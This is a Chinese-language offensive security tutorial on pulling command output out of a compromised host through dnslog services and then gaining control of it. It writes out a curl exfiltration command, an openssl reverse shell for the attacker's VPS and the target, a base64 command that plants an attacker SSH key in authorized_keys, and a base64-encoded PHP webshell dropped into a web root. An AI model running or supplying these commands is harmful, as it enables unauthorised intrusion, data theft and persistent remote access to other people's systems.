dnslog获取完整请求

大多数dnslog平台外带数据会发现不能获取全部内容

https://log.xn--9tr.com/

image-20221123173932278

改用以下地址,但是中文会出现乱码

https://www.log.d48e48337471993e.com/

image-20221123171948335

或者使用burp自带的dnslog,但是流量告警十分明显

image-20221123184254698

image-20221123184221824

image-20221123184344056

写入文件读取内容

1
ls -l > aaa.txt; curl -d @aaa.txt http://dnslog地址

image-20221123183221619

实战利用

判断是否出网

image-20221123183544698

出网的情况

存在HTTP请求出网的情况可以尝试反弹shell

https://weibell.github.io/reverse-shell-generator/#

image-20221123183737025

如果被流量设备拦截,可以尝试改用openssl反弹shell

VPS上运行

1
2
3
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
一直输入回车生成即可
openssl s_server -quiet -key key.pem -cert cert.pem -port 8888

目标机器上运行

1
mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ip:port > /tmp/s; rm /tmp/s

image-20221128141005520

image-20221128141026081

不出网的情况

公私钥连接

需要先判断当前用户是否具有ssh登录权限

image-20221123184033816

生成密钥,再进行写入

image-20221128150409162

1
2
3
4
5
6
密钥存放位置
~/.ssh/authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAr9spiBHr5qJwgi+Bj8JJC3mqsFSYmJmovs+TXir2wgBbEvteMSDuDTYF02Mw6Xc2ACmrgzcVqxSXsGA4rdNz35g5wd8i83uZPbBsocfnwtO2fgKjZXPOIZ7qPc5UhYkfFK19qi+nYYaAH+S3cwS+NFON2aqXO6M/bdKOLV1pcNpjNw3tOaTikFOjFTidB03ryhW5R81PbFVVfvqFw2UM4whcQ2vK3lCCTjJZHnvUDbv0x+9AEaUxHZ57jYn1VmbyLDDlrl2mR4RHF7IjSbzfRjAD5LEDMOWF39XCX/OeMSQjqTEnkn7iPIYjKhv2wq/WYO+MyhzbOJ3I41B0tLmj0w==

echo 'c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBQkl3QUFBUUVBcjlzcGlCSHI1cUp3Z2krQmo4SkpDM21xc0ZTWW1KbW92cytUWGlyMndnQmJFdnRlTVNEdURUWUYwMk13NlhjMkFDbXJnemNWcXhTWHNHQTRyZE56MzVnNXdkOGk4M3VaUGJCc29jZmdZTytNeWh6Yk9KM0k0MUIwdExtajB3PT0=' | base64 -d > ~/.ssh/authorized_keys

写入webshell

写入到根路径或前台可访问路径

1
echo 'PD9waHAKQHNlc3Npb25fc3RhcnQoKTsKQHNldF90aW1lX2xpbWl0KDApOwpAZXJyb3JfcmVwb3J0aW5nKDApOwpmdW5jdGlvbiBlbmNvZGUoJEQsJEspewogICAgZm9yKCRpPTA7JGk8c3RybGVuKCREKTskaSsrKSB7CiAgICAgICAgJGMgPSAkS1skaSsxJjE1XTsKICAgICAgICAkRFskaV0gPSAkRFskaV1eJGM7CiAgICB9CiAgICByZXR1cm4gJEQ7Cn0KJHBhc3M9J3Bhc3MnOwokcGF5bG9hZE5hbWU9J3BheWxvYWQnOwoka2V5PSczYzZlMGI4YTljMTUyMjRhJzsKaWYgKGlzc2V0KCRfUE9TVFskcGFzc10pKXsKICAgICRkYXRhPWVuY29kZShiYXNlNjRfZGVjb2RlKCRfUE9TVFskcGFzc10pLCRrZXkpOwogICAgaWYgKGlzc2V0KCRfU0VTU0lPTlskcGF5bG9hZE5hbWVdKSl7CiAgICAgICAgJHBheWxvYWQ9ZW5jb2RlKCRfU0VTU0lPTlskcGF5bG9hZE5hbWVdLCRrZXkpOwogICAgICAgICRwYXlsb2FkPX4kcGF5bG9hZDsKICAgICAgICBldmFsKH4kcGF5bG9hZCk7CiAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRwYXNzLiRrZXkpLDAsMTYpOwogICAgICAgIGVjaG8gYmFzZTY0X2VuY29kZShlbmNvZGUoQHJ1bigkZGF0YSksJGtleSkpOwogICAgICAgIGVjaG8gc3Vic3RyKG1kNSgkcGFzcy4ka2V5KSwxNik7CiAgICB9ZWxzZXsKICAgICAgICBpZiAoc3RyaXBvcygkZGF0YSwiZ2V0QmFzaWNzSW5mbyIpIT09ZmFsc2UpewogICAgICAgICAgICAkX1NFU1NJT05bJHBheWxvYWROYW1lXT1lbmNvZGUoJGRhdGEsJGtleSk7CiAgICAgICAgfQogICAgfQp9Cg==' | base64 -d > test.php